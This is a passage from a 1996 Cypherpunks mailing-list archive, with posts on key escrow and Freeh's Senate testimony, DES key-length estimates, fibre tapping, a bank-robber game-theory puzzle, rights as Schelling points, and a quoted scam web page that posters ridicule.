        non-trivial amount of extra load for the anonymizer machine.

Summary: Having said all that, I'd probably still like to have it.



<<<<>>>>
* Frames, for instance, do bizzare things when anonymized, at least
with Netscape 3.0b5.  Frames are, of course, _evil_, and are banned
by the CDA, and anyone who uses them should be flamed mercilessly
and forced to use Lynx on a 24x80 monochrome display until he or she
repents and sees the error of their ways, and if that doesn't work
they should be exiled to AOL with only Microsoft Word Internet Assistant.
But that's a flame for another day....
<<<<>>>>

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jul 1996 19:34:35 +0800
To: cypherpunks@toad.com
Subject: Re: IP: NSA RESPONSE TO KEY LENGTH REPORT
In-Reply-To: <21a.193396.40@iac-online.com>
Message-ID: <199607260642.XAA14728@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@research.att.com> writes:

 > Finally, the NSA report offers estimates of the time
 > required to perform exhaustive search using a Cray model T3D
 > supercomputer.  This is a curious choice, for as our report
 > notes, general-purpose supercomputers of this type make poor
 > (and uneconomical) key search engines.

A tiny nit to pick here.  The Cray T3D and T3E computers are
massively parallel machines consisting of DEC Alpha chips hooked
up in a 3D Torus configuration.  They would probably make pretty
decent key search engines, as opposed to the general purpose
vector supercomputers Cray is better known for.

 > Table 3 are out estimates based on our experience with a
 > Cray T3D supercomputer with 1024 nodes.  This machine costs
 > $30 million.

 > [Tables 1, 2, and 3 not transcribed here.]

You left out the most interesting part!

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 26 Jul 1996 14:21:28 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960725182916.8320F-100000@crl7.crl.com>
Message-ID: <9607260343.AA08244@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> The essential humourless of your reply is indicated by your
>> failure to realise that my conversion of your 25L into 2 cents
>> was satirical.

>Oh really?  Then how come you at first defended it with your
>attempted face-saving "GBP" comment?

Because your continued attempts to prop up what is a very
silly argument with even sillier ones is a source of amusement.
I had not at that point abandoned the satirical mode. Since
you can't take a hint and your arguments are now tiresome
rather than amusing I'll tell it to you straight:


As with Rush I don't have the slightest respect for your mode
of argument. You attempt to introduce "proof by wager" as a 
valid form of argument. You introduce irrelevant factors 
such whether Rush is richer than I am, something which you 
have no means of knowing and as it happens I don't know 
either. I don't know how rich you get by lying to the
American public and I haven't the foggiest idea what my 
portfolio is worth. There are only two levels of wealth 
"enough" and "not enough". I fall into the first category, 
Rush Limbaugh and yourself will fall into the latter 
regardless of how much money you earn.


In short your arguments are remarkably similar to those of
your hero Rush, fatuous, invalid logic, irrelevant facts and
gratuitous insults.

I think you are a fool, I think that Rush is a fool and I don't
consider that I need prove anything to you.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 26 Jul 1996 18:01:09 +0800
To: cypherpunks@toad.com
Subject: Freedom, crypto, and terrorism
In-Reply-To: <2.2.32.19960725212455.006a3bf8@pop1.jmb.bah.com>
Message-ID: <v03007800ae1e19bfccf0@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 PM -0700 7/25/96, Charley Sparks wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I forget who said " The price of freedom is eternal vigilance"  but it
>applies to threats both foreign and domestic. This includes the government.
>I trust no one absolutely. And I among many others have helped to pay for
>what freedom we have left.
>( He said, in a movin' to Idaho kinda way )

It was "Eternal vigilance is the price of liberty."

I have just revised my views on the topic of freedom, crypto, and terrorism
as a result of reading Benjamin Netanyahu's new book (a few months old) on
terrorism and what the West can do about it, in one sitting. The book was
written before he became Prime Minister.

So as not to start a flame war here, let me just say that no intelligent
person can discuss this subject without having read Netanyahu's book. It
should be required reading for every American.

No--I'm not going to say what my views now are. Let me just say that in
about 150 very closely reasoned pages, with lots of both historical and
current evidence, Netanyahu has brought me around totally in support of his
views and his prescription for the United States--and I understand much
better now why his positions on Israeli policy are directly in the vital
interests of the United States. Readers wishing an explanation for certain
recent US policies, as well as a guide to likely future ones will benefit
from this book, whose influence has reached the highest circles of US
leadership.

Informed readers will know what I mean. Those who aren't should become so
informed by reading the book. I would be happy to entertain a discussion of
the book via private e-mail with those who have read it.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 26 Jul 1996 18:28:37 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607252305.QAA06996@jobe.shell.portal.com>
Message-ID: <v03007801ae1e1cb77f7f@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 PM -0700 7/25/96, Hal wrote:
>I think the best way to approach this problem is to first try to solve
>it assuming there are only two robbers rather than 20.  Then once you
>have that figured out, try it for three, then four, and so on.  Keep in
>mind that 50% support is enough for a proposed distribution to pass, you
>don't need a strict majority.
>

Exactly. I arrived at the solution the same way. Note that there is another
assumption needed--that the selection of a proposer is by lot at each new
stage. If the ordering of proposers is known in advance, a different
solution results.

A further assumption is that a certainty gain of 1/n of the total sum is
preferred to a 1/n probability of gaining the entire sum and a (1-1/n)
probability of gaining nothing..

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 26 Jul 1996 19:58:14 +0800
To: Jeremey Barrett <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
In-Reply-To: <199607251813.NAA02650@galaxy.galstar.com>
Message-ID: <v03007803ae1e1fb13219@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:33 PM -0700 7/25/96, Jeremey Barrett wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Assuming "perfect" intelligence on the part of the robbers (i.e. they will
>follow deterministic behavior and do the "right" thing), then here's what
>must happen IMO (1 being the first guy and 20 being the last):
>
>1 must propose that 1, 3, 5, 7, 9, 11, 13, 15, 17, and 19 all split
>the money evenly. All of these will vote for it, assuming they're all
>perfectly smart and deduce the inevitable outcome.
>
>I arrived at this working backward from the case where two robbers are left.
>
>If 2 are left (19 & 20), 19 gets all the money. So 20 will vote for whatever
>18 says, which MUST include 20 in the deal. Since 19 knows this, 19
>will vote for whatever 17 says, which must include 19 in the deal, and so
>forth. Eventually you arrive at the conclusion that 1,3,5...,19 must
>all agree to split the money at the beginning.

Your solution fails if the proposer is determined by lot, stage by stage.
Any other approach will be felt unfair by some, but that approach will be
thought fair by all.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <jkenth@c2.org>
Date: Fri, 26 Jul 1996 19:14:08 +0800
To: cypherpunks@toad.com
Subject: Anonymous Web Services Inc.
Message-ID: <31F8711F.4707@c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Cpunx, ecashers, and others:

Oh joy, these guys are good publicity for our side. :^(
Arghh!!!

http://www.angelfire.com/pg1/digicrime/index.html
>                       Anonymous Web Services Inc.
> 
> ----------------------------------------------------------------------
> [Image]
> 
> What We Do
> 
>    * We make deals
> 
>    * We rip people off for you
> 
>    * We get you money
> 
>    * We get you WebServer accounts
> 
>    * We work for you
> 
> ----------------------------------------------------------------------
> We are an anonymous server that relays our pages through such services
> as Angelfire, C2, and many other services. We are in business for you
> benefit.
> 
>   If you have an America Online account, we have the capabilities to
>        give you complete unlimited access, and you pay nothing!
> ----------------------------------------------------------------------
> 
>    Have you always wanted that $8,000.00 snowboard? Or that 4x4 FORD
> F150? Well, if you give us the URL of the product you would like us to
>      get for you, just send the needed information, and we will go
> "shopping" for you. Of course this isn't totally free, you have to pay
>        5%. Hey, paying $5.00 for a $100.00 CD Player isn't bad!
> 
>   We deal in the anonymous market, as do most World Wide Web servers,
>  and that is why security is the top priority, wherever you go. If you
>    want to set up an account with us, so you can steal stuff, "buy"
>  stuff, and make anonymous web pages, send us your credit card number,
> and other needed information such as your expiration date, and we will
>           set up an accounts for you! We also accept ECash!
> 
>   Do you know somebody that you really hate? Tell us their name, and
>  what you would like to do to them, and we can make them wanted by the
>    Alabamba police, or we can anonymously transfer money from their
>    credit cards or checking accounts to you! Now dowsn't that sound
>                  great? Free money, and free pleasure!
> ----------------------------------------------------------------------
> 
>  If you create an accounts with us, you will feel nothing but the best
>  superiority to all of the little losers peddling aourd you. Consider
>    our service as, your own personal hacker. Except you can tell us
>   whatever you want, and make us fuck up your enemies. We don't kill
>              people, we just take away their old identity.
> ----------------------------------------------------------------------
>                 Send email to WebMaster@digicrime.org
> 
>                            Special Offer...
> ----------------------------------------------------------------------
> 
> If you are in Illinois, particularly in the northern part, we can give
>   you FREE Ameritech Voice Mail! Free? You ask, well there is an easy
>  way to get the numbers. You can either E-Mail me for instructions, or
> E-Mail me for a already made box. We have some boxes that allow you to
>  make calls from, for example, if you have a friend in Australia, give
>  him a call, talk to him for an hour. It is totally free, illegal, and
>                              untraceable.
> ----------------------------------------------------------------------
>                  Last Updated Tue Jul 2 01:04:34 1996
> ----------------------------------------------------------------------
>         This web page was provided by Angelfire Communications.
>   The material on this page are the responsibility of its author, not
>                        Angelfire Communications.Kent
-- 
Browse sample chapters of new books by bestselling authors, pay 
online with a credit card or ecash, then download books in HTML 
or Adobe Acrobat format from the web at http://www.pulpless.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Fri, 26 Jul 1996 20:31:04 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
In-Reply-To: <ae1d4dd915021004d9c5@[205.199.118.202]>
Message-ID: <960726.002108.6f7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay@got.net writes:

>                                      (I hate the term "nerd," as I hate the
> names "dweeb," "geek," "jerk," etc. Believe me, anyone who thinks being
> called a "nerd" is complimentary, or anyone who labels himself as a "geek,"
> is probably one who would call himself a "nigger," or a "queer.")

I have business cards that identify me as a "Certified Computer Geek[tm]".
They seem to impress the non-cognoscenti.  And as long as they are
amused (and their checks don't bounce), I'll make more cards.  Attitude
really is everything.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfhYuhvikii9febJAQHM9QQAitHxEgBJAk5rXDesCMrHiH+OHq0bdACo
K32Oxjp6B8PrksfZc421+ZcMbktAFp6zLr0PxRtXuHYst7U6POz2u8SjVArfqVrK
89lRIeVJlfdk1WXiWJ+Kjn9g3slV9eaanT48pSFoKpXpKaOaKFWj1eT+Kk5PQcGq
ABz3Elv4src=
=z38z
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 26 Jul 1996 19:08:45 +0800
To: "Dave Banisar" <cypherpunks@toad.com>
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <n1373804503.42138@epic.org>
Message-ID: <v03007804ae1e2226c5ed@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:03 PM -0700 7/25/96, Dave Banisar wrote:
>This is the written testimony of FBI Director Freeh before the
>Senate Commerce Committee on S 1726, the Pro-Code legislation.
>
>Freeh called for the adoption of an universal key escrow system
>that would facilitate law enforcement access.Several Senators were
>critical of Freeh's testimony and asked why
>he and the other panelists believed that savy criminals would
>use escrowed encryption.

They cannot have read his prepared statement, which addresses this issue
(see below). Neither, apparently did you, Dave, or you would not leave the
misleading impression Freeh didn't address this topic. Were you being
sloppy? Mendacious?

>Others questioned the possibility to any
>kind of world wide agreement could be reached.

Not valid. No sooner did Europeans reject the idea of the US as escrow
holder then they set busily to work developing their own standard. There's
no reason the US couldn't go along with what THEY decide (and trust me,
judging on form it will be more Draconian that what the US would have
created).

>
>Director Freeh admitted in responding to one Senator that he would
>seek legislation to ban non-escrow cryptography if it were not
>widely adopted. He said, "we are not at the point yet that volutary
>is not vialble. At that point, we would look at mandatory controls."
>He also stated that he would also ask for import controls to be
>imposed "if the country was flooded with foreign robust encryption."

This is consistent with Netanyahu's recent book on terrorism, except that
Freeh apparently doesn't include the civil liberties protections suggested
by Netanyahu. I'm surprised. Freeh is said to be a very smart man--he must
know that if he included those protections as an integral part of his
advocacy it would go down much better with the American people. Failure so
to do raises the most serious questions.

>
>A html version of this document is available at
>
>http://www.epic.org/crypto/export_controls/freeh.html


Thanks;

David

>
>
>------------
>
>
>	U.S. Department of Justice
>	Federal Bureau of Investigation
>	Office of the Director		Washington, D.C 20535
>
>STATEMENT
>OF
>LOUIS J. FREEH
>DIRECTOR
>FEDERAL BUREAU OF INVESTIGATION ON
>JULY 25, 1996
>BEFORE THE
>COMMITTEE ON COMMERCE, SCIENCE, AND TRANSPORTATION
>UNITED STATES SENATE
>REGARDING
>IMPACT OF ENCRYPTION ON LAW ENFORCEMENT AND PUBLIC SAFETY
>

...

> It is worth noting that we have never contended that a key
>escrow regime, whether voluntarily or mandatorily implemented, would
>prevent all criminals from obtaining non-key escrowed encryption
>products.  But even criminals need to communicate with others nationally
>and internationally, including not just their criminal confederates but
>also legitimate organizations such as banks. Accessible, key escrow
>encryption products clearly will be used by most if widely available,
>inexpensive, easy to use, and interoperable worldwide.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Fri, 26 Jul 1996 18:46:54 +0800
To: Erle Greer <cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <2.2.32.19960725225533.0070ca20@mail.sd.cybernex.net>
Message-ID: <v03007805ae1e24c262c7@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:55 PM -0700 7/25/96, Erle Greer wrote:
>At 09:09 AM 7/25/96 -0500, you wrote:
>>Here's a puzzle for our game theorists.
>>
>>Twenty cypherpunks robbed a bank. They took 20 million bucks. Here's
>>how they plan to split the money: they stay in line, and the first guy
>>suggests how to split the money. Then they vote on his suggestion. If
>>50% or more vote for his proposal, his suggestion is adopted.
>>
>>Otherwise they kill the  first robber and now it is the turn of guy #2
>>to make another splitting proposal. Same voting rules apply.
>>
>>The question is, what will be the outcome? How will they split the
>>money, how many robbers will be dead, and so on?
>>
>>igor
>>
>
>Here's my guess:
>Eache robber is going to want the largest share of the money possible.
>Therefore The first guy dies automatically because that increases the share
>size.  This continues on until there are only two robbers left.  Robber #19
>suggests that he receives the full 20 million and since his vote is 50%, he
>receives it all.  18 robbers dead.

No. Robber 18 knows that he will be killed under those circumstances, so he
proposes that Robber 20 gets all the money. 20 votes with him. Now iterate
backwards. If, under my assumption the proposers are selected by lot at
each stage, then 18 still knows he'd be killed, but not knowing which of 19
or 20 is the next proposer, suggests 19 and 20 split 50-50. Since each
knows that he might be #20 and get nothing on the next round, they accept.
Now iterate that one backwards.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Fri, 26 Jul 1996 17:03:28 +0800
To: cypherpunks@toad.com
Subject: Re: Apps: Unix for Windows 95
Message-ID: <960726004007_164494871@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


unix doesnt have to be $$$$$$$$ you can pick up a shareware version of unix
(all the power features in it) called linux. Info magic sells nice cd sets.
Goto your local microcenter... or search the net for linux (warning..about 80
googleplex hits will come up hehehe)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Fri, 26 Jul 1996 17:03:15 +0800
To: sandfort@crl.com>
Subject: Re: LIMBAUGH ON TV
In-Reply-To: <Pine.SUN.3.91.960725204730.16186D-100000@crl14.crl.com>
Message-ID: <9607260443.AA08500@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Res ipsa loquitur.

prospe tibi ut galia in tres partes dividaris.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Jul 1996 18:52:37 +0800
To: cypherpunks@toad.com
Subject: Re: Fireworks expected, missed at Senate crypto hearing
Message-ID: <199607260744.AAA23283@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:19 PM 7/25/96 -0500, Declan McCullagh wrote:

>Just more of the same, though we heard less about child pornographers and
>more about terrorists. And Sen. Slate Gorton (R-Wash) jumped on the
>committee staff for leaning too far *away* from national security interests
>in their summary of the legislation.

What does that mean?  As opposed to what?  (Gorton's my Senator, and I'm 
going to give a little feedback to his local office...)



>The FBI's Louis Freeh kept mouthing the same tired old line: "No reasonable
>person can envision a lawless information superhighway."

I guess that makes me an unreasonable person!


> "It was never meant to be that." 

Well, that's just the problem...for _him_!  Sometimes actions lead to 
hard-to-predict outcomes.


>We need cops there, as we need them elsewhere. The problem is
>the proliferation of unbreakable encryption." He said it's "not too late"
>to stop the spread.

Wishful thinking!  Not only is it too late now, it was too late with Clipper 
I was proposed.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 26 Jul 1996 19:01:59 +0800
To: cypherpunks@toad.com
Subject: Re: Data Sources for DES Breaking
In-Reply-To: <199607242051.NAA13352@netcom5.netcom.com>
Message-ID: <4t9t1u$iar@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199607242051.NAA13352@netcom5.netcom.com>,
Mike Duvos <mpd@netcom.com> wrote:
> Given that we might embark upon this public demonstration of the
> fragility of single DES, what should we use for test data?

How about a Kerberos packet?

Kerberos is a time-honored system.  There are a number of citations
that can be provided to prove that it is in use (perhaps heavy use?)
on Wall Street.

Alternatively, how about a Netscape SSL packet encrypted with DES?

I will volunteer to provide such a challenge if anyone is going to
undertake a serious keysearch effort.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 26 Jul 1996 20:20:10 +0800
To: cypherpunks@toad.com
Subject: Re: Princeton University muzzles students
In-Reply-To: <v01510101ae1dd364c4f2@[204.62.128.229]>
Message-ID: <Pine.GUL.3.95.960726014021.5999C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 25 Jul 1996, Declan McCullagh wrote:

> When Princeton administrators claimed they followed the letter of the
> law, in truth they used the law as an excuse to muzzle their students.

This instrumentalist conspiracy theory is a bit of a leap beyond the facts. 
They were spammed. The content of the spam was political. They responded
quite stupidly. There is no evidence that they were looking for "an excuse
to muzzle their students." 

They should "clarify" the policy, which everyone who would be expected to
enforce it opposes, within two weeks. Commercial speech might take longer.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfiFyJNcNyVVy0jxAQGznwIAkC50QnSfsuGZ+cylFBgDK/ibL136O6eW
LgXRVdCx4ZE2QERgq54O1FOWkvRdLfoXqVpr1Eai65z2wY117bBH6w==
=4XWE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 22:05:54 +0800
To: cypherpunks@toad.com
Subject: Re: Bare fibers
Message-ID: <199607260854.BAA23997@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM 7/25/96 -0700, abostick@netcom.com (Alan Bostick) wrote:
>As has been mentioned earlier, all an attacker has to do is encourage
>some of the light to exit the fiber, by bending it, contacting it with
>a detector, etc.
>If the detector is sensitive enough, the loss induced by this is minimal.
>This sort of tapping is exactly the sort of thing quantum cryptography
>is supposed to prevent, or at least identify.  

So far, so good.

>Nothing short of quantum methods is going to spot the tap, 
>unless you happen to come across the tap by inspecting the entire
>length of the fiber.

Pressurized conduit is a favorite paranoid technique - if the 
Bad Guy cuts open the conduit to get at the fiber, your alarm
system notices the pressure drop and goes off.
For slightly less paranoid scenarios, you can use heavy narrow
conduit with epoxied joints, and the extra alarm wire or two
to help detect cutting.  For substantially more paranoid types,
you can always fill your conduit with some sort of flammable
substance that reats with air...

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 21:19:39 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607260854.BAA24001@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 7/25/96 -0500, ichudov@algebra.com (Igor Chudov) wrote:
>In my initial post that caused all the turmoil I said (literally) this:
>``Twenty cypherpunks robbed a bank.''
>        ^^^^^^^^^^^^^
>I was careful choosing words.

That was my reaction as well.  I'd assume that if twenty cypherpunks
rob a bank, either it's one of Eric's party games (:-), or else 
they probably conspired over the net to rob a bank by computer.

1) The bank probably knows which bank got robbed.
2) The public probably won't hear about it.
3) The cypherpunks might or might not.
4) The number and identity of the cypherpunks is unknown,
        both to each other and to the bank.
5) If all twenty bank-robbing cypherpunks do conspire to
        get together in a room to split up the loot,
        it's probably a chat-room or mud-room;
        it's not likely to be physical space.
6) It's very hard to kill people whose identities you don't know
        across a net that obscures their physical location as well.
7) I suppose you could kill-file them, which does cut them out
        of the voting process, and therefore probably out of the money,
        but is certainly less drastic than shooting them.
8) Besides, how do you tell who's first on the list when they're
        all nyms anyway?
9) Who's got the money, anyway?  Was there some sort of secret-sharing
        protocol to make sure that the one cypherpunk holding the loot
        doesn't just telnet to Argentina.com with it?
10) Money? What money?
11) How do they conduct the voting?  Merely arguing over the voting
        protocols could occupy megabytes of list bandwidth.
12) They could just decide to use the money to pay the winner of
        a lottery to predict when somebody shoots Jim Bell.
13) But that wouldn't really take much, so there's still a lot left over.
14) N>10 of the twenty are really all Tentacles, so they can all
        vote to shoot any non-Tentacle and then vote to split the
        cash between themselves.  
15) They could even killfile one or two Tentacles just to make it look
        like a fair process.
16) I _knew_ we shouldn't have killfiled Lieutenant Niedermeyer!
17) Seventeen is the mystical number.
18) If the public _does_ hear about it, the bank's stock will drop
        like a rock, and they can use the money to buy out the bank.
19) It's mine, mine, all mine!
20) Bang!



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 26 Jul 1996 21:25:50 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Twenty Bank Robbers -- Game theory:)
Message-ID: <199607260909.CAA24224@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


My commentary below supposes that the robbers are _not_ cypherpunks,
but are fanatic logicians, and prefer poverty to death.
It also assumes that all motions are non-debatable,
which reduces the amount of dealmaking possible.

At 05:52 AM 7/26/96 -0400, Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:
>If only 19 and 20 are left, 19 has 50% of the vote, and can take all. #20 
>loses out.
>Therefore, with 18,19, and 20 left, 20 will take whatever 18 offers, as 
>it is better than getting nothing.
>With 17,18,19,20 left, 17 should propose a split with 20, who will likely 
>get a smaller cut from 18, because of the above.
>
>With 16, 17, 18, 19, 20, three votes are needed, reducing the take for 
>the majority, so no one other than #16 is acting in their best interest 
>to approve a split, except for #19 trying to avoid losing out to 17/20 in 
>the next round. Not enough for a majority.

Wrong.  If 16 gets killed, 18 knows that 17 and 20 will probably 
split the money, so it's in 18's interest to team with 16 and 19.

15, 17, and 20 can also vote to split the money.

14's position is a bit shakier, but he's got more people to deal with.

...>...
>All even-numbered cypherpunks should then expect a short life expectancy. 
>(You are number 6; who is number 1?)

What do you want?
        - The money!
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 05:45:15 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <ae1cf93910021004f831@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Several people have sent me private mail about this interpretation of
crypto/privacy rights. (I guess they don't think a message to the list as a
whole is warranted, to save room for ninja discussion.)

As I said, my essay was an explication of my my thoughts, not a footnoted,
rigorous derivation. For those interested in looking into more on this, a
seach of the keywords will produce lots of hits. Including one at David
Friedman's site: http://www.best.com/~ddfr/Academic/Property/Property.html.

I was meeting with him several months back and mentioned my Schelling point
interpretation of rights--he immediately lit up and referred me to his
forthcoming paper. Now it is possible I was influenced by comments on the
Extropians list about this (maybe by Hanson, Price, or Friedman himself).
Certainly it was the Extropians list where I first heard of Schelling
points.

Anyway, check it out.

At 3:31 PM 7/25/96, jbugden@smtplink.alis.ca wrote:

>Basically, in this view of rights and raising of children it would seem that a
>relativistic pragmatism prevails. Personally, I think that the two choices are
>either this relative pragmatism or an absolute morality.
>
>"Do unto others as you would have them do unto you."
>
>Some implications of Tim's view is that all our rights are basically a
>transitory agreement between individuals. If at any time the "cost" of a right
>becomes too high for too many (e.g. free speech leading to X for some X), then
>it is quite possible that this "right" will be removed. The "losers" have no
>higher appeal process in this matter than that of trying to gain a different
>consensus.

Partly so, but this view is _not_ the same a standard "majoritarianism," or
"rule of the herd." In liberal societies (liberal in the classical sense,
for those who only know the recent interpretation) there is a Schelling
point that says enforcing what others read is too expensive and intrusive
to enforce, and hence we will "let" others read Jackie Collins novels,
Salman Rushdie novels, whatever. Even if enough people dislike Collins and
Rushdie, the larger principle will typically make censorship impossible
(e.g., the enforcement mechanisms will not be in place).

And I have never said that people should not _lobby_ for principles of
freedom, obviously, as I am effectively lobbying in this and other essays.

>This may work while there is not a large power gap between any two individuals
>or groups, but as power shifts to fewer people and groups (economic, social,
>political, etc...) the "losers" may find that the lowest cost path is into some
>form of economic serfdom or slavery (e.g. McJobs). Ask Phil for other examples
>;-).

Even meant humorously (">;-)"), many of us would dispute the notion that a
voluntarily-taken job is a "McJob." Frankly, working at a fast-food place
is usually not a lifetime career, but is instead a way for high-school
students and others to gain work skills and to establish a "reputation"
useful for finding later jobs.

(I worked for $1.60 an hour, minimum wage, cleaning animal cages, taking
blood samples from mice, and so on. Back in high school. Certainly a
"McJob," in terms of pay and my status level, but useful in getting later
jobs.)

>Unlike Rawls, we are not in a position of developing our laws in advance of
>determining our social standing. I personally believe that our ability to
>develop reasonable laws and social structures will persist only as long as the
>majority of us have the ability to "put ourselves in someone else's shoes" and
>do in practical terms what Rawls suggests in theoretical ones.

Of course. (And Rawls would not disagree--this was his essential point.)


>As soon as those with power are not able to see a situation where they could
>become like those without power, there will cease to be motivation to
>maintain a
>"safety net" of rights or economic means to protect the "losers" of our
>society.

What are "those without power"?

The best way to help the "losers" of our economy is to allow voluntary
economic relationships to be formed.

(As an aside, the raising of the minimum wage to $5 or so will further
reduce employment opportunities for low-skilled, "starter" jobs.
Alternatives such as automation, moving offshore, or simply withdrawing
certain jobs will be attractive.)

Fortunately, strong crypto means ways to route around these so-called
"safety nets."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@bunch.ci.houston.tx.us>
Date: Fri, 26 Jul 1996 18:53:12 +0800
To: cypherpunks@toad.com
Subject: RE: Bandwidth
Message-ID: <Pine.LNX.3.91.960726032153.2474C-100000@bunch.ci.houston.tx.us>
MIME-Version: 1.0
Content-Type: text/plain


I guess the statement about this being an "active" list was a little 
understated - however it did not mention anything about being used as a 
personal forum for petty bickering.  I have a slow link (see 9600bps) to the 
internet and have been watching messages steadily trickle in for the past 
two or three hours concerning Rush and a "wager" between two people - I 
notice that they copy the other interested party as if they would not 
receive it via the list like EVERYONE ELSE DOES!

Maybe I'm opening myself up for a flame - I might even deserve it if this 
discussion in fact does have something to do with cryptography and or 
related bits of information.  If it does - please let me know (private 
mail is fine - you can even copy the list if you feel everyone deserves 
to see me ripped to shreds).

My 2 cents,
Al

-
No, not like Bundy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jul 1996 07:19:33 +0800
To: cypherpunks@toad.com
Subject: CD Prices and Inflation
Message-ID: <ae1d128412021004e95d@[205.199.118.202]>
MIME-Version: 1.0
